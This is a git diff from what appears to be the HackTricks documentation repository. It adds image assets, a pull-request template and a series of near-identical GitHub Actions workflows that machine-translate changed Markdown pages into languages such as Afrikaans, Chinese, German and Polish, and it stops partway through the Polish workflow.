diff --git a/.gitbook/assets/image (88).png b/.gitbook/assets/image (88).png
new file mode 100644
index 0000000000..26d1fff4bd
Binary files /dev/null and b/.gitbook/assets/image (88).png differ
diff --git a/.gitbook/assets/image (89) (1).png b/.gitbook/assets/image (89) (1).png
new file mode 100644
index 0000000000..05d5e97a94
Binary files /dev/null and b/.gitbook/assets/image (89) (1).png differ
diff --git a/.gitbook/assets/image (89).png b/.gitbook/assets/image (89).png
new file mode 100644
index 0000000000..677ac1e3a5
Binary files /dev/null and b/.gitbook/assets/image (89).png differ
diff --git a/.gitbook/assets/image (9) (1) (1) (1) (1).png b/.gitbook/assets/image (9) (1) (1) (1) (1).png
new file mode 100644
index 0000000000..c933d46923
Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (9) (1) (1) (1).png b/.gitbook/assets/image (9) (1) (1) (1).png
new file mode 100644
index 0000000000..b9ba83cc03
Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1) (1).png differ
diff --git a/.gitbook/assets/image (9) (1) (1).png b/.gitbook/assets/image (9) (1) (1).png
new file mode 100644
index 0000000000..67c7b2f016
Binary files /dev/null and b/.gitbook/assets/image (9) (1) (1).png differ
diff --git a/.gitbook/assets/image (9) (1).png b/.gitbook/assets/image (9) (1).png
new file mode 100644
index 0000000000..7593f6f365
Binary files /dev/null and b/.gitbook/assets/image (9) (1).png differ
diff --git a/.gitbook/assets/image (9) (2).png b/.gitbook/assets/image (9) (2).png
new file mode 100644
index 0000000000..03ad3a91f4
Binary files /dev/null and b/.gitbook/assets/image (9) (2).png differ
diff --git a/.gitbook/assets/image (9).png b/.gitbook/assets/image (9).png
new file mode 100644
index 0000000000..01b5eed6d9
Binary files /dev/null and b/.gitbook/assets/image (9).png differ
diff --git a/.gitbook/assets/image (90).png b/.gitbook/assets/image (90).png
new file mode 100644
index 0000000000..327adc67bd
Binary files /dev/null and b/.gitbook/assets/image (90).png differ
diff --git a/.gitbook/assets/image (91).png b/.gitbook/assets/image (91).png
new file mode 100644
index 0000000000..331ec323ab
Binary files /dev/null and b/.gitbook/assets/image (91).png differ
diff --git a/.gitbook/assets/image (92) (1) (1).png b/.gitbook/assets/image (92) (1) (1).png
new file mode 100644
index 0000000000..fb0364e97b
Binary files /dev/null and b/.gitbook/assets/image (92) (1) (1).png differ
diff --git a/.gitbook/assets/image (92) (1).png b/.gitbook/assets/image (92) (1).png
new file mode 100644
index 0000000000..26d1fff4bd
Binary files /dev/null and b/.gitbook/assets/image (92) (1).png differ
diff --git a/.gitbook/assets/image (92).png b/.gitbook/assets/image (92).png
new file mode 100644
index 0000000000..c57fa4d22d
Binary files /dev/null and b/.gitbook/assets/image (92).png differ
diff --git a/.gitbook/assets/image (93).png b/.gitbook/assets/image (93).png
new file mode 100644
index 0000000000..dba03333fb
Binary files /dev/null and b/.gitbook/assets/image (93).png differ
diff --git a/.gitbook/assets/image (94).png b/.gitbook/assets/image (94).png
new file mode 100644
index 0000000000..5e3da11539
Binary files /dev/null and b/.gitbook/assets/image (94).png differ
diff --git a/.gitbook/assets/image (95).png b/.gitbook/assets/image (95).png
new file mode 100644
index 0000000000..3830349ac5
Binary files /dev/null and b/.gitbook/assets/image (95).png differ
diff --git a/.gitbook/assets/image (96).png b/.gitbook/assets/image (96).png
new file mode 100644
index 0000000000..6267537833
Binary files /dev/null and b/.gitbook/assets/image (96).png differ
diff --git a/.gitbook/assets/image (97).png b/.gitbook/assets/image (97).png
new file mode 100644
index 0000000000..242eb34e38
Binary files /dev/null and b/.gitbook/assets/image (97).png differ
diff --git a/.gitbook/assets/image (98).png b/.gitbook/assets/image (98).png
new file mode 100644
index 0000000000..9f61033b1e
Binary files /dev/null and b/.gitbook/assets/image (98).png differ
diff --git a/.gitbook/assets/image (99).png b/.gitbook/assets/image (99).png
new file mode 100644
index 0000000000..b4b0305b79
Binary files /dev/null and b/.gitbook/assets/image (99).png differ
diff --git a/.gitbook/assets/image.png b/.gitbook/assets/image.png
new file mode 100644
index 0000000000..6cee6d557a
Binary files /dev/null and b/.gitbook/assets/image.png differ
diff --git a/.gitbook/assets/openshift-missing-service-account-image1.png b/.gitbook/assets/openshift-missing-service-account-image1.png
new file mode 100644
index 0000000000..0a4a041e1e
Binary files /dev/null and b/.gitbook/assets/openshift-missing-service-account-image1.png differ
diff --git a/.gitbook/assets/openshift-missing-service-account-image2.png b/.gitbook/assets/openshift-missing-service-account-image2.png
new file mode 100644
index 0000000000..be0a6bd7cf
Binary files /dev/null and b/.gitbook/assets/openshift-missing-service-account-image2.png differ
diff --git a/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg b/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg
new file mode 100644
index 0000000000..b7f7fc4c7f
Binary files /dev/null and b/.gitbook/assets/telegram-cloud-document-4-5875069018120918586.jpg differ
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg
new file mode 100644
index 0000000000..690bdba6ce
Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5780773316536156543-x.jpg differ
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg
new file mode 100644
index 0000000000..54ce729387
Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg differ
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg
new file mode 100644
index 0000000000..f8d42cbb30
Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-5920521132757336440-y.jpg differ
diff --git a/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg b/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg
new file mode 100644
index 0000000000..f3dc12cd29
Binary files /dev/null and b/.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg differ
diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md
new file mode 100644
index 0000000000..c574644889
--- /dev/null
+++ b/.github/pull_request_template.md
@@ -0,0 +1,12 @@
+You can remove this content before sending the PR:
+
+## Attribution
+We value your knowledge and encourage you to share content. Please ensure that you only upload content that you own or that have permission to share it from the original author (adding a reference to the author in the added text or at the end of the page you are modifying or both). Your respect for intellectual property rights fosters a trustworthy and legal sharing environment for everyone.
+
+## HackTricks Training
+If you are adding so you can pass the in the [ARTE certification](https://training.hacktricks.xyz/courses/arte) exam with 2 flags instead of 3, you need to call the PR `arte-<username>`.
+
+Also, remember that grammar/syntax fixes won't be accepted for the exam flag reduction.
+
+
+In any case, thanks for contributing to HackTricks!
diff --git a/.github/workflows/translate_af.yml b/.github/workflows/translate_af.yml
new file mode 100644
index 0000000000..246ee9ae29
--- /dev/null
+++ b/.github/workflows/translate_af.yml
@@ -0,0 +1,81 @@
+name: Translator to AF (Afrikaans)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: af
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Afrikaans
+      BRANCH: af
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_cn.yml b/.github/workflows/translate_cn.yml
new file mode 100644
index 0000000000..61c5f3116b
--- /dev/null
+++ b/.github/workflows/translate_cn.yml
@@ -0,0 +1,81 @@
+name: Translator to CN (Chinese)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: cn
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Chinese
+      BRANCH: cn
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_de.yml b/.github/workflows/translate_de.yml
new file mode 100644
index 0000000000..facbeab4ef
--- /dev/null
+++ b/.github/workflows/translate_de.yml
@@ -0,0 +1,81 @@
+name: Translator to DE (German)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: de
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: German
+      BRANCH: de
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_es.yml b/.github/workflows/translate_es.yml
new file mode 100644
index 0000000000..9c34959a46
--- /dev/null
+++ b/.github/workflows/translate_es.yml
@@ -0,0 +1,81 @@
+name: Translator to ES (Spanish)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: es
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Spanish
+      BRANCH: es
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_fr.yml b/.github/workflows/translate_fr.yml
new file mode 100644
index 0000000000..52eac6c34a
--- /dev/null
+++ b/.github/workflows/translate_fr.yml
@@ -0,0 +1,81 @@
+name: Translator to FR (French)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: fr
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: French
+      BRANCH: fr
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_gr.yml b/.github/workflows/translate_gr.yml
new file mode 100644
index 0000000000..21f18d2714
--- /dev/null
+++ b/.github/workflows/translate_gr.yml
@@ -0,0 +1,81 @@
+name: Translator to GR (Greek)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: gr
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Greek
+      BRANCH: gr
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_in.yml b/.github/workflows/translate_in.yml
new file mode 100644
index 0000000000..9862987709
--- /dev/null
+++ b/.github/workflows/translate_in.yml
@@ -0,0 +1,81 @@
+name: Translator to IN (Hindi)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: in
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Hindi
+      BRANCH: in
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_it.yml b/.github/workflows/translate_it.yml
new file mode 100644
index 0000000000..7112058095
--- /dev/null
+++ b/.github/workflows/translate_it.yml
@@ -0,0 +1,81 @@
+name: Translator to IT (Italian)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: it
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Italian
+      BRANCH: it
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_jp.yml b/.github/workflows/translate_jp.yml
new file mode 100644
index 0000000000..bf22ed9e27
--- /dev/null
+++ b/.github/workflows/translate_jp.yml
@@ -0,0 +1,81 @@
+name: Translator to JP (Japanese)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: jp
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Japanese
+      BRANCH: jp
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
diff --git a/.github/workflows/translate_kr.yml b/.github/workflows/translate_kr.yml
new file mode 100644
index 0000000000..d5b8514081
--- /dev/null
+++ b/.github/workflows/translate_kr.yml
@@ -0,0 +1,81 @@
+name: Translator to KR (Korean)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: kr
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Korean
+      BRANCH: kr
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
+          python -m pip install --upgrade pip
+          pip3 install openai tqdm tiktoken
+      
+      - name: Update & install wget & translator.py
+        run: |
+          sudo apt-get update
+          sudo apt-get install wget -y
+          cd scripts
+          rm -f translator.py
+          wget https://raw.githubusercontent.com/carlospolop/hacktricks-cloud/master/scripts/translator.py
+          cd ..
+
+      - name: Download language branch #Make sure we have last version
+        run: |
+          git config --global user.name 'Translator'
+          git config --global user.email 'github-actions@github.com'
+          git checkout "$BRANCH"
+          git pull
+          git checkout master
+      
+      - name: Run translation script on changed files
+        run: |
+          echo "Starting translations"
+          echo "Commit: $GITHUB_SHA"
+
+          # Export the OpenAI API key as an environment variable
+          export OPENAI_API_KEY=${{ secrets.OPENAI_API_KEY }}
+
+          # Run the translation script on each changed file
+          git diff --name-only HEAD~1 | grep -v "SUMMARY.md" | while read -r file; do
+            if echo "$file" | grep -qE '\.md$'; then
+              echo -n "$file , " >> /tmp/file_paths.txt
+            else
+              echo "Skipping $file"
+            fi
+          done
+
+          echo "Translating $(cat /tmp/file_paths.txt)"
+          python scripts/translator.py --language "$LANGUAGE" --branch "$BRANCH" --api-key "$OPENAI_API_KEY" -f "$(cat /tmp/file_paths.txt)" -t 3
+
+      - name: Commit and push changes
+        run: |
+          git checkout "$BRANCH"
+          git add -A
+          git commit -m "Translated $BRANCH files" || true
+          git push --set-upstream origin "$BRANCH"
\ No newline at end of file
diff --git a/.github/workflows/translate_pl.yml b/.github/workflows/translate_pl.yml
new file mode 100644
index 0000000000..124cc6dccb
--- /dev/null
+++ b/.github/workflows/translate_pl.yml
@@ -0,0 +1,81 @@
+name: Translator to PL (Polish)
+
+on:
+  push:
+    branches:
+      - master
+    paths-ignore:
+      - 'scripts/**'
+      - '.gitignore'
+      - '.github/**'
+  workflow_dispatch:
+
+concurrency: pl
+
+jobs:
+  run-translation:
+    runs-on: ubuntu-latest
+    environment: prod
+    env:
+      LANGUAGE: Polish
+      BRANCH: pl
+
+    steps:
+      - name: Checkout code
+        uses: actions/checkout@v2
+        with:
+          fetch-depth: 0 #Needed to download everything to be able to access the master & language branches
+
+      - name: Set up Python
+        uses: actions/setup-python@v2
+        with:
+          python-version: 3.8
+
+      - name: Install dependencies
+        run: |
